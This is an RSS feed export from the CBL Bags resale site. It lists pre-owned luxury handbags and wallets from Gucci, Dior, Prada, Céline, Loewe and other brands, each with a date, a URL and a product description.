Gucci Handbag https://www.cblbags.com/en/p/gucci-marmont-mini-gg-black-cowhide-leather-handbag/ Fri, 05 Oct 2018 10:00:13 +0000 https://www.cblbags.com/?post_type=product&p=24552 This Gucci handbag is perfect to carry all your essentials 24/7!

La entrada Gucci Handbag se publicó primero en CBL Bags.

]]>
The small GG Marmont chain shoulder bag has a softly structured shape crafted of black matelassé calfskin leather with chevron pattern and the classic heart on the back side. It features a front flap that shows the famous double G clasp which opens to a microfiber lining with a suede-like finish interior. Its chain and cowhide strap allows a perfect shoulder or cross-body carry.

La entrada Gucci Handbag se publicó primero en CBL Bags.

]]>
Dior wallet https://www.cblbags.com/en/p/dior-lady-dior-niki-de-saint-phalle-love-wallet/ Wed, 26 Sep 2018 11:03:51 +0000 https://www.cblbags.com/p/dior-lady-dior-niki-de-saint-phalle-love-wallet/ Maria Grazia Chiuri was inspired on Niki de Saint Phalle's work for this Collection.

La entrada Dior wallet se publicó primero en CBL Bags.

]]>
This Lady Dior Niki de Saint Phalle Wallet is part of the Summer/Spring 2018 Prêt-à-porter Collection. It is crafted of ecru calfskin leather and gold-tone hardware. It features a colorful “love” print on the front and a golden-tone zipper that gives access to an interior full of different compartments for a perfect organization. It’s in very good condition considering its delicate color; just mention some soft marks on leather. It preserves the inner cardboards and includes box, paper, invoice, tag, dustbag and charm.

La entrada Dior wallet se publicó primero en CBL Bags.

]]>
Gucci Handbag https://www.cblbags.com/en/p/red-sylvie-gucci-mini-handbag/ Wed, 19 Sep 2018 10:55:45 +0000 https://www.cblbags.com/?post_type=product&p=24556 Being part of the 2018 Collection, this mini bag is ideal to cheer-up any outfit.

La entrada Gucci Handbag se publicó primero en CBL Bags.

]]>
Crafted of Gucci’s classic, smooth leather in red color, this Sylvie bag with a structured shape, combines a grosgrain bow, a nylon web and gold-tone metal hardware. It features a long chain strap, perfect to carry on your shoulder or as a cross-body. A front flap opens to a microfiber interior with a suede-like finish that features an open pocket.
This handbag is in a very good condition, does not show signs of use. Includes dustbag and brochure.

La entrada Gucci Handbag se publicó primero en CBL Bags.

]]>
Dior handbag https://www.cblbags.com/en/p/dior-lady-dior-niki-de-saint-phalle-handbag/ Tue, 04 Sep 2018 16:13:26 +0000 https://www.cblbags.com/p/dior-lady-dior-niki-de-saint-phalle-handbag/ Maria Grazia Churi inspired this beautiful collection in Niki de Saint Phalle's work.

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
This Lady Dior handbag belongs to the Summer/Spring 2018 prêt-à-porter Collection. It is crafted of ecru calfskin leather and gold-tone hardware. It shows a colorful “love” print on the front and the classic Dior charm on the right. It features double handle and a removable strap to wear this bag confortably on your shoulder. It is in a very good condition overall considering its delicate color. Features some soft marks on interior and exterior, mostly on handles and top flap. Includes box, paper, small dustbag, authenticity card, charm, 2 stud covers and invoice.

La entrada Dior handbag se publicó primero en CBL Bags.

]]>
Chopard handbag https://www.cblbags.com/en/p/chopard-black-cowhide-leather-coctail-impetiale-handbag/ Mon, 23 Jul 2018 16:47:29 +0000 https://www.cblbags.com/?post_type=product&p=24311 A versatile handbag, able to adapt different outfits.

La entrada Chopard handbag se publicó primero en CBL Bags.

]]>
This Coctail Imperiale handbag from Chopard is crafted of black quilted cowhide leather and gold-tone hardware. It features an interlaced chain that allows a perfect shoulder or cross-body carry. Its black lined open interior features different compartments. This Chopard bag is in very good condition; does not show signs of use.

La entrada Chopard handbag se publicó primero en CBL Bags.

]]>
Chopard Shoulder Bag https://www.cblbags.com/en/p/imperiale-all-day-chopard-shoulder-bag/ Wed, 11 Jul 2018 11:47:58 +0000 https://www.cblbags.com/?post_type=product&p=24117 Conserved in a mint condition, this handbag breathes all Chopard's refinement.

La entrada Chopard Shoulder Bag se publicó primero en CBL Bags.

]]>
This Imperiale All Day bag is remarkably useful. It is crafted of blue quilted calfskin leather and gold-tone hardware. Its a light and roomy bag that can be worn on your shoulder or as a cross-body thanks to its interlaced chain, and features different pockets for a perfect organization. It also has two lateral fasteners to regulate its width and four metallic studs to protect the base of the bag.

La entrada Chopard Shoulder Bag se publicó primero en CBL Bags.

]]>
Loewe bag https://www.cblbags.com/en/p/loewe-bag-6/ Fri, 06 Jul 2018 16:50:42 +0000 https://www.cblbags.com/?post_type=product&p=23922 This limited edition from the famous Spanish brand is absolutely irresistible!

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Loewe surprises us with this special edition of one of its icons; the Amazona bag. It is crafted of black calfskin leather combined with silver hardware. In spite of its tiny size -12 cm long- this Mini Amazona bag features all the characteristics of the famous design: double handle, corner patches, the embossed anagram, padlock, etc. Apart from that, it also features a thin and long desmontable strap that makes this bag perfect for a shoulder or cross-body carry.

La entrada Loewe bag se publicó primero en CBL Bags.

]]>
Chloé Bag https://www.cblbags.com/en/p/small-bracelet-nile-black-gold-bag/ Mon, 25 Jun 2018 17:25:08 +0000 https://www.cblbags.com/producto/small-nile-bracelet-black-gold-bag/ Inspired by the equestrian world, this Chloé bag is absolutely feminine.

La entrada Chloé Bag se publicó primero en CBL Bags.

]]>
This Small Bracelet Nile bag is crafted of black calfskin leather and gold-tone hardware. It can be worn on you shoulder or as a cross-body thanks to its desmontable and adjustable strap; it also can be worn as a handbag because of its elegant metal bracelet. A front flap opens to a beige suede interior that features a flat pocket.

La entrada Chloé Bag se publicó primero en CBL Bags.

]]>
Prada Handbag https://www.cblbags.com/en/p/prada-cahier-clack-and-tan-handbag/ Fri, 22 Jun 2018 17:27:50 +0000 https://www.cblbags.com/?post_type=product&p=24180 The structured silhouette of Prada's Cahier bag is inspired by antique books. A beautiful bag to wear day or night.

La entrada Prada Handbag se publicó primero en CBL Bags.

]]>
It is crafted of smooth and textured thus and black calfskin leather combined with burnished gold-tone metal hardware. A front flap opens to a leather lined interior that features different compartments, perfect to keep everything organized. This Cahier bag from Prada in mint condition can be worn on your shoulder or as a cross-body thanks to its adjustable strap. Its retail price is 2400€

La entrada Prada Handbag se publicó primero en CBL Bags.

]]>
Yves Saint Laurent Bag https://www.cblbags.com/en/p/yves-saint-laurent-bag-lulu-fuchsia-calfskin-leather/ Tue, 09 Jan 2018 19:12:43 +0000 https://www.cblbags.com/?post_type=product&p=15446/ Combining a classic and modern style, this Yves Saint Laurent Lulu design is a fun and light shoulder bag to carry your essentials everyday!

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
Color blast! This Yves Saint Laurent bag has the ideal size to carry all day long!

It is made of fuchsia calfskin leather and gold-tone hardware. It´s single front flap has a beautiful geometric clasp that gives the final touch to this wonderful shoulder bag. When we open the flap we can see two compartments lined with fuchsia suede; the main one has an open pocket crafted in tone leather. It features a single adjustable shoulder strap with a gold-tone buckle to carry comfortably.

Light and classic in a vibrant color, this bag is ideal to pull off any outfit!

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-vintage-box-shoulder-bag-blue-leather/ Tue, 09 Jan 2018 17:00:26 +0000 https://www.cblbags.com/?post_type=product&p=15417/ Light and classic, this Céline Box shoulder bag is an ideal vintage bag to carry all your daily essentials.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Featuring a deep blue this Céline vintage bag is ideal to carry everyday. This Box bag is made of midnight blue calfskin leather and gold-tone hardware, it has a single adjustable strap to carry comfortably on your shoulder. It single front flap fits in a gold-tone buckle. The open interior has three pockets, one of which closes with zipper. Elegant and classy as all Celine´s vintage beauties.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
YSL Bag https://www.cblbags.com/en/p/ysl-kate-medium-red-calfskin-leather-bag/ Tue, 09 Jan 2018 17:58:36 +0000 https://www.cblbags.com/?post_type=product&p=15410/ It is the right accessory to go with any special outfit. This Yves Saint Laurent Kate Medium is made of soft calfskin and it combines its intense color with an elegant golden hardware.

La entrada YSL Bag se publicó primero en CBL Bags.

]]>
Ready to rock! Day or night, this Yves Saint Laurent is the ideal bag to shake any outfit! Combining red calfskin leather and gold-tone hardware, it features a single flap with magnetic closure with the brand logo and a marvelous tassel. As we open the fold, we notice the red suede lined interior with a slit pocket. This Yves Saint Laurent also features a long thin chain, ideal to carry the bag comfortably on your shoulder or as a cross body.

La entrada YSL Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-shoulder-bag-black-calfskin/ Tue, 09 Jan 2018 16:58:07 +0000 https://www.cblbags.com/?post_type=product&p=15430/ A classy and light shoulder bag from the well known french house. Beautiful and vintage bag ideal to pull of any outfit.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Made of black calfskin leather and gold-tone hardware, this Celine vintage shoulder bag has a single regular strap to carry comfortably on your shoulder or as a cross body. It single flap closes with a gilded buckle. As we lift the flap, we can notice three different compartments lined with grain black leather. The first one has a slit pocket and the second one disposes two more divisions. This light and classy Celine´s vintage shoulder bag, is ideal to match any outfit. 

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Yves Saint Laurent Bag https://www.cblbags.com/en/p/yves-saint-laurent-classic-universite-bag-medium/ Fri, 27 Oct 2017 09:12:24 +0000 https://www.cblbags.com/?post_type=product&p=14878/ The Université bag is comfy, roomy and discreet. A perfect essential to easily combine with all your clothing while remaining smart and classy.

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
One of the most recent bags from YSL, the Classic Monogram Université. It is crafted of black calfskin and palladium hardware. Featuring an adjustable long strap to wear the bag over your shoulder and even cross-body. The bag displays a full frontal flap with the YSL interlocking signature in palladium hardware with a leather decor band. The flap is fixed with a magnetic snap closure and opens to a suede-lined interior. The bag is divided in two compartments, the main one including a zippered pocket.

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-lady-dior-mini-animal-print-bag/ Wed, 18 Oct 2017 17:08:42 +0000 https://www.cblbags.com/?post_type=product&p=14978/ The Lady Dior Mini bag is an irresistible style because its size, design and manufacturing. Plus the classic Dior cannage, it incorporates a delicate animal print. Undoubtedly, one of the brand’s most classic styles that still has a lot to offer for handbag customers.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
The miniature bag is the cutest accessories trend to take from the upcoming collections. So, here it is the Lady Dior Mini featuring a delicate leopard print with a stunning pony-effect calfskin. This new and recently launched Lady Dior Mini also incorporates a wide and comfortable strap allowing to wear the bag in multiple ways. Also, the iconic but renewed D.I.O.R. block charms in the same gold-tone as the hardware, it really catches the eye. This style features double handle, small inner flap and golden hardware. Its interior is lined with brown suede and includes two small pockets, one of which is zipped.

 

 

 

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-dionysus-gg-supreme-mini/ Wed, 11 Oct 2017 08:54:21 +0000 https://www.cblbags.com/?post_type=product&p=14876/ The measurements of the Gucci Dionysus GG Supreme Mini make it perfect as a bag to carry the daily essentials. In addition, its sliding chain strap can be worn multiple ways. Indeed an ultralight but sophisticated mini bag.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Gucci has been named one of the most highly coveted brands in the world. So, this Gucci GG Supreme Mini is a stunning Gucci bag as it concentrates the best of this well-known style which is already considered an icon. Made of the classic beige/ebony GG Supreme canvas it makes such a nice contrast with its beige suede lining. This soft material is also present on its sides, base and flap. As the main touch, a textured tiger head spur is shown on its flap, a reference to the Greek god Dionysus, who in myth is said to have crossed the river Tigris on a tiger sent to him by Zeus. Its interior includes a pocket under the flap and a pin closure with side release. Its sliding chain strap can be worn as a shoulder strap or as a cross body. All edges of the bag are hand painted.

 

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-pionniere-bicolor-city-calf-leather-shoulder-bag/ Mon, 09 Oct 2017 08:26:18 +0000 https://www.cblbags.com/?post_type=product&p=14767/ This Pionnière bicolor is inspired by saddle bags and designed with the taste of classic "box" purses. Its nylon and multicolor strap combined with the intense ocre leather puts the cherry on this really chic cake.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Prada bag crafted of ocre and coconut brown City Calf leather. Its curvy shape is inspired by classic saddle bags, making of this model a compact yet spacious piece, roomy enough to keep all your daily needs. The Prada logo in gold metal stands out in the front overall flap, which closes with a magnetic clasp. This flap opens up to a nappa-lined interior in brown with a wall pocket. Nevertheless, the nylon strap is the distinctive feature of this bag, a shoulder flat strap with its multicolor striped pattern linked to the bag thanks to a couple of large grommets. Hardware throughout the bag is gold-bathed.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Balenciaga Bag https://www.cblbags.com/en/p/balenciaga-bag/ Thu, 05 Oct 2017 17:21:42 +0000 https://www.cblbags.com/?post_type=product&p=14769/ The Shopper S, with handles and strap, is designed to be a day-to-day bag in the city. Roomy and fresh, the Arena pattern strikes withs its trendy, "out of the box" allure.

La entrada Balenciaga Bag se publicó primero en CBL Bags.

]]>
This Shopping Bag from Balenciaga is the Bazar S. It is crafted of lambskin leather showing the tricolored Arena striped pattern, here in black, blue and white. It features shiny palladium hardware and embossed gold Balenciaga logo on the front. Double handles are flat and comfortable to wear the bag over your shoulder and by hand, whereas the leather strap really makes a difference by allowing cross-body wear. A double top zipper opens up to a fabric-lined interior in black with a zip pocket and a patch pocket with Balenciaga embossed tag inside. 

La entrada Balenciaga Bag se publicó primero en CBL Bags.

]]>
Yves Saint Laurent Bag https://www.cblbags.com/en/p/yves-saint-laurent-classic-monogram-medium-bag-fleur/ Tue, 26 Sep 2017 10:52:52 +0000 https://www.cblbags.com/?post_type=product&p=14687/ Really chic and trendy, displaying a delicious Fleur color, this YSL Monogram Classic in medium size is the perfect statement piece to any daytime or nighttime outfit.

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
This Monogram Classic Saint Laurent bag is crafted of textured calfskin leather in pale Fleur pink. The gold-tone chain is perfect to wear the bag over your shoulder but also cross-body. A distinguished interlocking metal YSL logo stands out from the front flap, which has a magnetic snap closure giving access to the interior of the bag. This Monogram Classic is lined with black grosgrain fabric and includes a slit pocket.

 

La entrada Yves Saint Laurent Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-lady-dior-bag-black-patent/ Thu, 20 Jul 2017 10:41:42 +0000 https://www.cblbags.com/?post_type=product&p=14232/ This bag is a Dior classic. Small and easy to carry because of its lightness, the black patent strikes a smart yet stunning combination.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
This Lady Dior is made of black patent leather with the classic “cannage” stitching signature. Double short handle for this handbag and the well-known charm of the brand. This bag is light and perfect to combine. Its interior is lined with monogrammed Dior fabric and includes a wall pocket with zipper.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Dolce&Gabbana Bag https://www.cblbags.com/en/p/dolcegabbana-sicily-medium-bag-red/ Wed, 19 Jul 2017 16:36:20 +0000 https://www.cblbags.com/?post_type=product&p=14255/ The most iconic model from the Italian brand in red color. Ideal to combine with a more casual and plane outfit.

La entrada Dolce&Gabbana Bag se publicó primero en CBL Bags.

]]>
Crafted of calf and grained red leather. Very well structured and iconic model. Closes with a flap with double magnetic clasp. Its top handle shows metal links and golden bars with leather. Four metallic feet to protect the bottom. The bag is lined with leopard-print fabric including a zipper pocket. It comes with a Sicily mirror that can be kept into a wall pocket inside the bag. Thanks to a removable and adjustable leather strap,

 

 

La entrada Dolce&Gabbana Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/14202/ Tue, 18 Jul 2017 15:26:50 +0000 https://www.cblbags.com/?post_type=product&p=14202/ This Promenade has simple and traditional lines, is miniaturized for more casual carry but being small is quite roomy. Perfect for everyday, this lavender color makes it irresistible!

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
This bag concentrates the best touches of the Italian house. Made of saffiano leather and featuring a stunning and delicate lavender color, it has rounded silhouette and two-way zip-around opening. Gold hardware. Small but with enough room to store more than your essentials. This Prada features of double rolled tote handles with rings, a hanging covered key ring, a solid base with four metallic studs and a removable adjustable cross body strap. Its inner part is divided into tree compartments by a center zip compartment and it has two wall pockets. Also, it is line with the classic Prada logo jacquard lining.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-exotic-leather-crocodile-whisky-vintage/ Thu, 13 Jul 2017 16:17:51 +0000 https://www.cblbags.com/?post_type=product&p=14177/ Gorgeous and super stylish vintage bag from the Spanish brand. Crafted of exotic leather, it is elegant but also really comfy. Dare to be different.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Vintage bag from the Spanish brand Loewe crafted of exotic crocodile leather in whisky color. Its sliding chain is gold-tone bathed and ideal to wear the bag on your shoulder, but also cross-body if used in full-length. The bag is open on the upper part and shows two deep compartments on the inside. It’s lined in brown calfskin leather and includes a zipped pocket.

 

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag-5/ Thu, 06 Jul 2017 17:01:30 +0000 https://www.cblbags.com/?post_type=product&p=14000/ This new version from the Promenade model has a more structured base. This item is crafted of wonderful fuchsia leather and can be worn either as a clutch or as cross-body bag.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Dior bag from the Miss Dior Promenade collection crafted of fuchsia lambskin leather. It shows the cannage quilted design with the same pink stitching. Its S-lock clasp is one of its most recognizable features along with the removable chain, which includes a leather pad to ease the carry. This bag is a multipurpose piece, allowing you to wear it cross-body, on your shoulder or as a clutch if you remove the chain. All metallic pieces are golden-bathed. Its interior is lined with fuchsia and black lambskin and has several compartments: the main open one, another purse-like department with zipper, 7 slots for cards and a flat pocket for documents. Besides, the bag shows an exterior rear pocket.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-9/ Thu, 22 Jun 2017 07:45:24 +0000 https://www.cblbags.com/?post_type=product&p=13712/ To wear by hand or crossbody. The bamboo strap with braided leather enhances a bohemian charm that blends with the classy appearance from this model.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
The New Bamboo is a medium-sized handbag crafted of black calfskin. Its main feature, the bamboo handle with braided leather, stands out from the rest of the bag. The turn-lock closure and the bottom of the tassel are also made of bamboo. The flap opens to a cream linen and cotton lining including a zippered pocket and a wall pocket wth press-lock closure. The bag includes a double strap, in leather and chain, to wear the bag crossbody. The bag has silver hardware and extensible bottom thanks to the accordion structure.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Dior WOC https://www.cblbags.com/en/p/dior-clutch-wallet-on-chain-diorama-nude-pink/ Thu, 15 Jun 2017 17:24:58 +0000 https://www.cblbags.com/?post_type=product&p=13390/ From an architectonic inspiration, this clutch with clean lines is the perfect match both for the day and night. The Diorama collection at its top refinement.

La entrada Dior WOC se publicó primero en CBL Bags.

]]>
This clutch Wallet on Chain is crafted of Nude grained calfskin with an oversize cannage. This Diorama model features the “archicannage” stitching and a decorative shield-shape lock that covers the actual press-lock. Thanks to its removable chain, this bag con be worn cross-body, on the shoulder or as a clutch. Both the chain and every metallic accents is pale gold-bathed. Its has a roomy interior compartment with a flat pocket, a zipped pocket and four card slots. This clutch keeps the essential: your cell-phone, money and credit cards.

La entrada Dior WOC se publicó primero en CBL Bags.

]]>
Prada Backpack https://www.cblbags.com/en/p/prada-mini-backpack-nylon-military-green-black-leather/ Tue, 13 Jun 2017 10:49:51 +0000 https://www.cblbags.com/?post_type=product&p=13627/ Practical and discreet to carry on a daily basis, this Mini model has the ideal size for city-wearing and is really easy to combine.

La entrada Prada Backpack se publicó primero en CBL Bags.

]]>
Prada Mini backpack made of military green nylon and black leather trims. Its flap opens to a drawstring closure that secures the top open part of the backpack. The flap itself has a leather buckle and magnetic clasp. Featuring two adjustable back bands and two front pockets with buckle and magnetic clasp. Its interior is lined with monogrammed black satin and includes a zippered pocket.

La entrada Prada Backpack se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-pionniere-vitello-leather-shoulder-bag/ Thu, 08 Jun 2017 10:38:03 +0000 https://www.cblbags.com/?post_type=product&p=13467/ This refined Pionnière is designed with the taste of classic "box" bags but offering a distinctive feature, its bicolor striped strap. A different Prada, and a must.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Prada bag crafted of black vitello leather. Its curvy shape, from classic saddle inspiration, makes of this bag a compact ye spacious piece, roomy enough to keep all your needs. The Prada logo in gold metal stands out in the front overall flap, which closes with a magnetic clasp. This flap opens up to a nappa-lined interior in deep red with a wall pocket. Nevertheless, the nylon bicolor strap is the distinctive feature of this bag, a shoulder flat strap with black&white striped pattern linked to bag thanks to a couple of large grommets. Hardware throughout the bag is gold-bathed.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag-4/ Tue, 06 Jun 2017 13:36:18 +0000 https://www.cblbags.com/?post_type=product&p=13366/ The Diorama is a contemporary design and a statement bag for the new Dior woman. It is a classic beauty, timeless and clean, with a super soft touch thanks to its tufted velvet. A bag ready to be carried by many for years to come

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Urban style, modern and full of personality. The Diorama flap bag comes with power and dressed in tufted velvet and leather. Its colors are black and night blue and it features a big flap that closes with the iconic metal shield in soft gold. The bag has a stylish chain, perfect to wear it on hand and as a plus it includes a nylon and leather detachable strap. Its inner part is lined with soft and blue leather and it is divided in three compartments.


La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Balenciaga Bag https://www.cblbags.com/en/p/balenciaga-bazar-shopper-m-bag-arena-medium/ Tue, 06 Jun 2017 11:41:51 +0000 https://www.cblbags.com/?post_type=product&p=13370/ This bag comes complete with box, dustbag and tags. A fresh style with large capacity. Let yourself be drawn by this Bazar and its super chic Arena pattern.

La entrada Balenciaga Bag se publicó primero en CBL Bags.

]]>
Wonderful Shopping Bag from Balenciaga, this Bazar is crafted of lambskin leather in the tricolored Arena stripes pattern, here in red, blue and white. It features shiny palladium hardware and embossed gold Balenciaga logo on front. Its handles are long, flat and comfortable to wear the bag on your shoulder. A double top zipper opens up to a fabric-lined interior in black with a zip pocket and a patch pocket with Balenciaga embossed tag inside. 

 

La entrada Balenciaga Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-5/ Fri, 02 Jun 2017 16:29:24 +0000 https://www.cblbags.com/?post_type=product&p=13369/ A Panda! Made of ultra-soft calfskin leather in black and white is a cozy and original design. Full of personality, this Panda is eye-catching!

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Panda-shaped mini bag made of calf leather in black and white color. It includes an adjustable and detachable strap and dustbag with tag. Impeccable silhouette. It features a polished silver-tone hardware and  top zip closure and lacquered edging. Ultralight and soft.

 

 

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-8/ Thu, 01 Jun 2017 10:14:21 +0000 https://www.cblbags.com/?post_type=product&p=13351/ This is the ideal urban bag. The Soho Mini is made of grain leather and includes a chain-link shoulder strap. Small, with rounded shape and zip closure, this Gucci is always a great option.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
The Gucci Soho Mini is the perfect bag to wear 24/7. It is made of bronze color grain leather and it features a single chain-link shoulder strap, interlocking GG embroidery at front and a tassel accent at side. It is truly an urban bag, because of its lightness and long chain perfect to wear across the chest, and it is at the same time, ideal to combine with an evening look, thanks to its size and color. Its interior is the classic cotton linen lining.

 

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-5/ Wed, 31 May 2017 17:53:09 +0000 https://www.cblbags.com/?post_type=product&p=13283/ It is one of the most popular Céline bags. The Belt features an original and singular "combo" as its is made of wool felt and leather. Lightweight and practical, it comes along with a detachable shoulder strap. A contemporary bag that will last forever.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
This Céline made of burgundy wool felt and leather combination, is the Belt bag. A stunning and formidable bag designed based on lightness and comfort. It features a awinged silhouette, a single top handle and a detachable leather strap. Fastened fold-over flap concealing at top zipper closure and it also has a back zipper pocket. Palladium hardware and four footed seat. Its interior features one cell phone pocket and one open pocket.

 

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Miu Miu Bag https://www.cblbags.com/en/p/miu-miu-bag/ Thu, 25 May 2017 11:06:25 +0000 https://www.cblbags.com/?post_type=product&p=13204/ A really special crossbody. A mini bag tricking you into believing it's a backpack! Super cute yellow "sole" color for this model you are gonna fall in love with.

La entrada Miu Miu Bag se publicó primero en CBL Bags.

]]>
Very special Miu Miu model, designed as a mini backapack in quilted leather, yellow sole. This bag is a crossbody with a removable silver chain. It also features two nylon straps on the back like a real backpack. There’s a hook on the top to hang it wherever you want and a front zippered pocket. Its wrap-around zipper opens up to a yellow satin lining. All metallic pieces are made of silver.

La entrada Miu Miu Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-7/ Mon, 22 May 2017 09:58:38 +0000 https://www.cblbags.com/?post_type=product&p=13171/ Gucci and its famous bamboo have been together since 1947. Thus, in this design that is already an icon, the premise of the brand is perfectly blended with the distinctive of this material.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
The New Bamboo is a medium-sized handbag that is main features is its nicely crafted bamboo handle. This material is also used in some other details as the  turn-lock closure as well as the charm (fringes). The New Bamboo has a beautiful rounded line and its silhouette is even visible once the bag is open. Cream linen and cotton lining, it has a wall inner pocket. Apart from the main handle, this bag incorporates a detachable leather strap.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag-3/ Fri, 19 May 2017 16:39:45 +0000 https://www.cblbags.com/?post_type=product&p=13121/ This Lady Mini Dior is fashionably beautiful and complements any woman’s style. A timeless and unique work of art, Dior shows its meticulously crafted by hand in this tiny style.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
The French brand concentrates in the Lady Dior all its essence. This bag, made of soft leather in a baby blue color, it is great because its super mini size. Cozy and tiny is perfect as an accessory for an evening styling. The bag is enhanced by iconic Dior “Cannage” stitching and it has silver hardware. Interior lined in the famous signature drawing on gray fabric. It has a double wide handle and the classic Dior “charm”. A great style full of personality.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-4/ Thu, 18 May 2017 10:10:23 +0000 https://www.cblbags.com/?post_type=product&p=13060/ Céline is one of the great brands that reinvents its most iconic designs to continue renovating the closet its followers. This Box in an intense blue and with gold hardware, is a total crush.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
The leather Céline Box Bag with antiqued brass hardware is indeed one of the most distinguished bag and on of the most recognizable Céline bags. This style is divided in three compartments like an accordion and has several different compartments very well organized thanks to its zippered slot for smaller items and wall pockets. The Celine box bag also features a detachable strap that can be adjusted to two different lengths. Also, it has a push-lock closure at front flap and also features a flap strap to wear it on shoulder or cross body. Blue leather lining.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-soho-disco-rose-peony-leather-messenger-bag/ Wed, 03 May 2017 11:52:07 +0000 https://www.cblbags.com/?post_type=product&p=12765/ Wonderful Soho Disco Bag in Peony Rose. It is a very feminine, ultralight and trendy bag. An essential piece for the woman of today.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Small and easy to wear thanks to its thin and adjustable strap, this Gucci Soho Disco in natural-grained peony rose leather is light and really feminine. Its front side shows the interlocked embossed GG. It has top zipper and soft gold metallic accents. A nice tassel with metallic bottom serves as zipper pull. The zipper opens to an off-white cotton linen fabric containing a patch pocket and a slide pocket, both open.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Loewe Accessories https://www.cblbags.com/en/p/loewe-accesories/ Tue, 02 May 2017 11:55:54 +0000 https://www.cblbags.com/?post_type=product&p=12791/ The Loewe T Pouch can be a cozy mini bag to carry tucked under the arm or a pochette for your favorite bag. Made based on Loewe's finest craftsmanship, this T Pouch in green becomes irresistible.

La entrada Loewe Accessories se publicó primero en CBL Bags.

]]>
This is one of the most recognizable Loewe pieces. The T Pouch is made of calfskin leather in a stunning green color. The pochette features a engraved leather with a repeat Loewe’s anagram pattern and hand-painted edges. It has a secure the zip using the interlocking strap. The interior is lined with a beige fabric and its has double wall pocket.

 

 

La entrada Loewe Accessories se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-dionysus-embroidered-shoulder-bag/ Thu, 27 Apr 2017 08:56:07 +0000 https://www.cblbags.com/?post_type=product&p=12767/ The Gucci Dionysus is one of the most wanted, the it bag. With these embroidered rhinestones and colored stones, this bag is a unique piece, essential for every fashion lover.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>

A structured taupe suede and GG Supreme canvas bag with the textured tiger head closure, a reference to the Greek god Dionysus, who in myth is said to have crossed the river Tigris on a tiger sent to him by Zeus.

The sliding chain strap, with a maximum useful length of 38cm, can be worn multiple ways, changing between a shoulder and a top handle bag. The embroidered rhinestones, small Swarovski stones and bead appliqués are specially manufactured and sewn by hand onto organza. It shows antique silver-toned hardware, rhinestone hand appliqué with colored stones and beads; rhinestone comet, moon and star appliqués. The tiger head closure has a press-lock device to open the main canvas flap. Under this main one, we can find an inner suede flap with a front pocket under it. It also shows an external rear pocket and hand-painted edges. The interior has two compartments with a zipped pocket in the middle working as a divider.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-4/ Tue, 18 Apr 2017 11:08:20 +0000 https://www.cblbags.com/?post_type=product&p=12470/ The WOC bags are here to stay forever. Ultralight and great to hold your essentials, this Valentino in soft grey tone is perfect to combine with any of your outfits. So cool!

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
